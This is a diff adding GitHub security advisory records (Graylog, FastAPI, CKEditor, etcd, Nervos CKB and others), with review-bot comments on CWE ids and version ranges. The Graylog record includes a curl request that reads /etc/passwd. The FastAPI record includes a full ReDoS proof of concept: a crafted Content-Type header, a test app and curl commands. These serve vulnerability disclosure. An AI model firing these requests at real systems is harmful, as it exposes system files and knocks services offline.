"type": "WEB", + "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25146" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-204" + ], + 
"severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T18:30:36Z",
+ "nvd_published_at": "2024-02-08T04:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-mw2c-vx6j-mg76/GHSA-mw2c-vx6j-mg76.json b/advisories/github-reviewed/2024/02/GHSA-mw2c-vx6j-mg76/GHSA-mw2c-vx6j-mg76.json
new file mode 100644
index 0000000000000..1a70f159882c0
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-mw2c-vx6j-mg76/GHSA-mw2c-vx6j-mg76.json
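Review bot: The details say `7.2.0 through 7.4.1, and older unsupported versions` are affected, but the `release.portal.bom` range starts at `introduced: "7.2.0"`, so anything before 7.2.0 is reported clean despite the prose; either `introduced: "0"` or a sentence in the details explaining why the range is cut at 7.2.0 would resolve the mismatch. The two `release.dxp.bom` ranges carry the same `and older unsupported versions` caveat and the same question. This hunk starts on an earlier line than the one this note is anchored to.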
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mw2c-vx6j-mg76", + "modified": "2024-02-07T20:24:12Z", + "published": "2024-02-07T17:31:34Z", + "aliases": [ + "CVE-2024-24816" + ], + "summary": "CKEditor4 Cross-site Scripting vulnerability in samples with enabled the preview feature", + "details": "### Affected packages\nThe vulnerability has been discovered in the samples that use the [preview](https://ckeditor.com/cke4/addon/preview) feature:\n\n* `samples/old/**/*.html`\n* `plugins/[plugin name]/samples/**/*.html`\n\nAll integrators that use these samples in the production code can be affected.\n\n### Impact\n\nA potential vulnerability has been discovered in one of CKEditor's 4 samples that are shipped with production code. The vulnerability allowed to execute JavaScript code by abusing the misconfigured [preview feature](https://ckeditor.com/cke4/addon/preview). It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment.\n\n### Patches\nThe problem has been recognized and patched. 
The fix will be available in version 4.24.0-lts.\n\n### For more information\nEmail us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.\n\n### Acknowledgements\nThe CKEditor 4 team would like to thank Marcin Wyczechowski & Michał Majchrowicz AFINE Team for recognizing and reporting this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ckeditor4" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.24.0-lts" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-mw2c-vx6j-mg76" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24816" + }, + { + "type": "WEB", + "url": "https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb" + }, + { + "type": "WEB", + "url": "https://ckeditor.com/cke4/addon/preview" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ckeditor/ckeditor4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T17:31:34Z", + "nvd_published_at": "2024-02-07T17:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-p6gg-5hf4-4rgj/GHSA-p6gg-5hf4-4rgj.json b/advisories/github-reviewed/2024/02/GHSA-p6gg-5hf4-4rgj/GHSA-p6gg-5hf4-4rgj.json new file mode 100644 index 0000000000000..d73b823a86e2c --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-p6gg-5hf4-4rgj/GHSA-p6gg-5hf4-4rgj.json 
@@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p6gg-5hf4-4rgj", + "modified": "2024-02-07T20:24:28Z", + "published": "2024-02-07T18:23:43Z", + "aliases": [ + "CVE-2024-24824" + ], + "summary": "Graylog vulnerable to instantiation of arbitrary classes triggered by API request", + "details": "### Summary\n\nArbitrary classes can be loaded and instantiated using a HTTP PUT request to the `/api/system/cluster_config/` endpoint.\n\n### Details\n\nGraylog's cluster config system uses fully qualified class names as config keys. To validate the existence of the requested class before using them, Graylog loads the class using the class loader. \n\nhttps://github.com/Graylog2/graylog2-server/blob/e458db8bf4f789d4d19f1b37f0263f910c8d036c/graylog2-server/src/main/java/org/graylog2/rest/resources/system/ClusterConfigResource.java#L208-L214\n\n\n### PoC\nA request of the following form will output the content of the `/etc/passwd` file:\n\n```\ncurl -u admin: -X PUT http://localhost:9000/api/system/cluster_config/java.io.File \\\n -H \"Content-Type: application/json\" \\\n -H \"X-Requested-By: poc\" \\\n -d '\"/etc/passwd\"'\n```\n\nTo perform the request, authorization is required. Only users posessing the `clusterconfigentry:create` and `clusterconfigentry:edit` permissions are allowed to do so. These permissions are usually only granted to `Admin` users.\n\n### Impact\n\nIf a user with the appropriate permissions performs the request, arbitrary classes with 1-arg String constructors can be instantiated. 
\n\nThis will execute arbitrary code that is run during class instantiation.\n\nIn the specific use case of `java.io.File`, the behaviour of the internal web-server stack will lead to information exposure by including the entire file content in the response to the REST request.\n\n### Credits\n\nAnalysis provided by Fabian Yamaguchi - Whirly Labs (Pty) Ltd", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.graylog2:graylog2-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "5.1.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.graylog2:graylog2-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.2.0-alpha.1" + }, + { + "fixed": "5.2.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-p6gg-5hf4-4rgj" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24824" + }, + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/commit/75ef2b8d60e7d67f859b79fe712c8ae7b2e861d8" + }, + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/commit/7f8ef7fa8edf493106d5ef6f777d4da02c5194d9" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Graylog2/graylog2-server" + }, + { + "type": "WEB", + "url": "https://github.com/Graylog2/graylog2-server/blob/e458db8bf4f789d4d19f1b37f0263f910c8d036c/graylog2-server/src/main/java/org/graylog2/rest/resources/system/ClusterConfigResource.java#L208-L214" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T18:23:43Z", + "nvd_published_at": "2024-02-07T18:15:55Z" + } +} \ No newline at end of file 
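Review bot: `cwe_ids` is `CWE-284`, but the details describe loading and instantiating a caller-supplied fully qualified class name taken from the `/api/system/cluster_config/` path, for which `CWE-470` (Use of Externally-Controlled Input to Select Classes or Code) is the more specific weakness; `CWE-284` could remain as a secondary id since the request does require cluster-config permissions. The first range begins at `introduced: "2.0.0"` with nothing in the details or references supporting that bound — a link or a sentence on where it comes from would help consumers of the range. This hunk starts on an earlier line than the one this note is anchored to.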
diff --git a/advisories/github-reviewed/2024/02/GHSA-pm3m-32r3-7mfh/GHSA-pm3m-32r3-7mfh.json b/advisories/github-reviewed/2024/02/GHSA-pm3m-32r3-7mfh/GHSA-pm3m-32r3-7mfh.json
new file mode 100644
index 0000000000000..24d6a2beebf4d
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-pm3m-32r3-7mfh/GHSA-pm3m-32r3-7mfh.json
@@ -0,0 +1,72 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pm3m-32r3-7mfh",
+ "modified": "2024-02-03T00:03:07Z",
+ "published": "2024-02-03T00:03:07Z",
+ "aliases": [
+
+ ],
+ "summary": "Etcd embed auto compaction retention negative value causing a compaction loop or a crash",
+ "details": "### Impact\nData Validation\n\n### Detail\nThe parseCompactionRetention function in embed/etcd.go allows the retention variable value to be negative and causes the node to execute the history compaction in a loop, taking more CPU than usual and spamming logs.\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "go.etcd.io/etcd"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.4.0-rc.0"
+ },
+ {
+ "fixed": "3.4.10"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 3.4.9"
+ }
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "go.etcd.io/etcd"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.3.23"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-pm3m-32r3-7mfh"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-03T00:03:07Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
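Review bot: The `details` field opens with `### Impact\nData Validation`, which is a vulnerability category rather than an impact statement; the sibling etcd record GHSA-j86v-2vjr-fg8f uses `### Vulnerability type` for the same slot, and the actual impact (a compaction loop that raises CPU use and floods logs) sits under `### Detail`. Renaming the heading to `### Vulnerability type` keeps the two records consistent. The summary also says `or a crash`, which nothing in the details describes — either the details should cover the crash case or the summary should drop it. `cwe_ids` is empty; `CWE-20` (Improper Input Validation) matches a negative retention value being accepted.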
diff --git a/advisories/github-reviewed/2024/02/GHSA-pr39-8257-fxc2/GHSA-pr39-8257-fxc2.json b/advisories/github-reviewed/2024/02/GHSA-pr39-8257-fxc2/GHSA-pr39-8257-fxc2.json
new file mode 100644
index 0000000000000..1141f6c051d61
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-pr39-8257-fxc2/GHSA-pr39-8257-fxc2.json
@@ -0,0 +1,54 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pr39-8257-fxc2",
+ "modified": "2024-02-02T22:22:42Z",
+ "published": "2024-02-02T22:22:42Z",
+ "aliases": [
+
+ ],
+ "summary": "Nervos CKB DoS: Process exists when p2p discovery protocol receives unsupported peer IP",
+ "details": "The p2p discovery protocol assumes that the peer IP must be valid IPv4 address.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "ckb"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.34.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-pr39-8257-fxc2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/nervosnetwork/ckb/commit/d909cdebacc4747e972de4a7e5f19c8f79480361"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-02T22:22:42Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-q669-2vfg-cxcg/GHSA-q669-2vfg-cxcg.json b/advisories/github-reviewed/2024/02/GHSA-q669-2vfg-cxcg/GHSA-q669-2vfg-cxcg.json
new file mode 100644
index 0000000000000..097c74f70368e
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-q669-2vfg-cxcg/GHSA-q669-2vfg-cxcg.json
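Review bot: The summary reads `Process exists when p2p discovery protocol receives unsupported peer IP`; given the `DoS` prefix this is the process exiting, so `exits` is the intended word. The details are a single sentence about the IPv4 assumption and say nothing about the impact (node termination) or whether a remote peer can trigger it, which is what the `LOW` rating rests on; one more sentence drawn from the linked fix commit would make the record self-explanatory. `cwe_ids` is empty; `CWE-20` (Improper Input Validation) fits an unvalidated peer address.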
@@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q669-2vfg-cxcg", + "modified": "2024-02-02T20:59:17Z", + "published": "2024-02-02T20:59:17Z", + "aliases": [ + + ], + "summary": "Nervos CKB Unaligned Pointer Dereference", + "details": "via bounty@nervos.org\n\nThere are multiple type conversions in ckb that unsafely cast between byte pointers and other types of pointers. This results in unaligned pointers, which are not allowed by the Rust language, and are considered undefined behavior, meaning that the compiler is free to do anything with code. This can lead to unpredictable bugs that can become security vulnerabilities.\n\nSome of the bugs here could potentially lead to buffer overreads in malformed data (it's not clear to me as I haven't investigated the practical impact of these bugs).\n\nTwo of these (in blockchain.rs) do not create unaligned data. They do though perform an unsafe operation that may not uphold the invariants of the safe function they are in, and could lead to undefined behavior and buffer overreads on malformed input.\n\nThese are of the same nature as those in my previous report about the molecule crate.\n\nPatch attached for commit 1b09e37c8e1b7945495cd18d9782417fbe51e986 that fixes all cases I know of at this time.\n\nPlease consider this report for reward under the terms of the bug bounty program.\n\nRelated advisory: https://github.com/nervosnetwork/molecule/security/advisories/GHSA-rffv-8x7x-p7pw", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.31.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.31.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-q669-2vfg-cxcg" + }, + { + "type": "WEB", + "url": 
"https://github.com/nervosnetwork/ckb/commit/adf8f0d08bc058383a0df658ea2c2ef6e7950335"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-02T20:59:17Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-q73f-w3h7-7wcc/GHSA-q73f-w3h7-7wcc.json b/advisories/github-reviewed/2024/02/GHSA-q73f-w3h7-7wcc/GHSA-q73f-w3h7-7wcc.json
new file mode 100644
index 0000000000000..fdadfc65afb89
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-q73f-w3h7-7wcc/GHSA-q73f-w3h7-7wcc.json
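Review bot: `details` is the reporter's bounty submission reproduced verbatim (`via bounty@nervos.org`, `Please consider this report for reward…`) rather than an advisory description; a maintainer-written impact statement would serve readers better, with the report kept as a reference if needed. The related molecule advisory cited in the last line, `https://github.com/nervosnetwork/molecule/security/advisories/GHSA-rffv-8x7x-p7pw`, is not in `references` and could be added as `WEB`. `cwe_ids` is empty; the reporter's own wording points at unaligned pointer use and possible buffer over-reads, so `CWE-125` is a hedged fit. This hunk starts on an earlier line than the one this note is anchored to.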
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q73f-w3h7-7wcc",
+ "modified": "2024-02-03T00:18:13Z",
+ "published": "2024-02-03T00:18:13Z",
+ "aliases": [
+
+ ],
+ "summary": "Nervos CKB Transaction which calls syscall load_cell_data_hash has nondeterministic result",
+ "details": "### Impact\nTx-pool verify transaction which inputs' script contains `load_cell_data_hash` is nondeterministic\n\n\n### Workarounds\nEnforce tx-pool ResolvedTrascation inputs' load data is none.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "ckb"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.34.2"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.34.1"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-q73f-w3h7-7wcc"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/nervosnetwork/ckb/commit/01eb5b2ecadf7e421b117d6c013e182978746e2f"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/nervosnetwork/ckb/commit/fe83220905599e72c97878295f4769e91348d738"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/nervosnetwork/ckb/commit/ff88b48779358e038209f3ac1bc1061e6f4deb13"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-03T00:18:13Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json b/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json
new file mode 100644
index 0000000000000..579a8c116f812
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json
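Review bot: `database_specific.severity` is `CRITICAL` but `severity` is `[]`, so the highest-rated record in this batch is the only one whose label has no CVSS vector behind it; every other rated record here pairs the label with a `CVSS_V3` entry, and this one should too or the rating should be explained in the details. The details are two lines, and the workaround names `ResolvedTrascation`, presumably `ResolvedTransaction`; a sentence on what nondeterministic verification means for consensus or pool admission would justify the rating for readers. `cwe_ids` is empty; nothing on the page pins a specific weakness, so that is for the maintainers to fill in.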
@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qf9m-vfgh-m389", + "modified": "2024-02-05T17:01:54Z", + "published": "2024-02-05T17:01:54Z", + "aliases": [ + "CVE-2024-24762" + ], + "summary": "FastAPI Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\nThis is also reported to Starlette at: https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\n\n### PoC\n\nCreate a FastAPI app that uses form 
data:\n\n```Python\n# main.py\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM 
ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument 
and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "fastapi" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.109.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.109.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tiangolo/fastapi" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:54Z", + "nvd_published_at": "2024-02-05T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-qfv2-3p2f-vg48/GHSA-qfv2-3p2f-vg48.json b/advisories/github-reviewed/2024/02/GHSA-qfv2-3p2f-vg48/GHSA-qfv2-3p2f-vg48.json new file mode 100644 index 0000000000000..b437bca470fb1 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-qfv2-3p2f-vg48/GHSA-qfv2-3p2f-vg48.json 
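Review bot: The affected list pins only `fastapi` < 0.109.1, yet the details locate the vulnerable regex in `python-multipart` (`multipart/multipart.py#L72-L74`), so an application that upgrades FastAPI but ends up with an old `python-multipart` from another constraint may still be exposed; the record should say what the 0.109.1 change actually does (presumably a raised `python-multipart` requirement — confirm against commit 9d34ad0) and reference the python-multipart advisory next to the Starlette one. The PoC's remark that `--workers N` is defeated by N+1 requests is the operationally important detail: a pegged event loop also stops answering health checks, so this is a full outage per worker rather than a slowdown, and the Impact section should say so. The only mitigation short of upgrading that the text implies is rejecting oversized or malformed `Content-Type` parameters in front of the app, which a short `### Workarounds` section could state (or rule out).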
@@ -0,0 +1,55 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qfv2-3p2f-vg48",
+ "modified": "2024-02-02T16:55:20Z",
+ "published": "2024-02-02T06:30:32Z",
+ "withdrawn": "2024-02-02T16:55:20Z",
+ "aliases": [
+
+ ],
+ "summary": "Duplicate Advisory: Central Dogma Authentication Bypass Vulnerability via Session Leakage",
+ "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-34q3-p352-c7q8. This link is maintained to preserve external references.\n\n## Original Description\nCentral Dogma versions prior to 0.64.0 is vulnerable to Cross-Site Scripting (XSS), which could allow for the leakage of user sessions and subsequent authentication bypass.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "com.linecorp.centraldogma:centraldogma-server"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.64.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1143"
+ },
+ {
+ "type": "WEB",
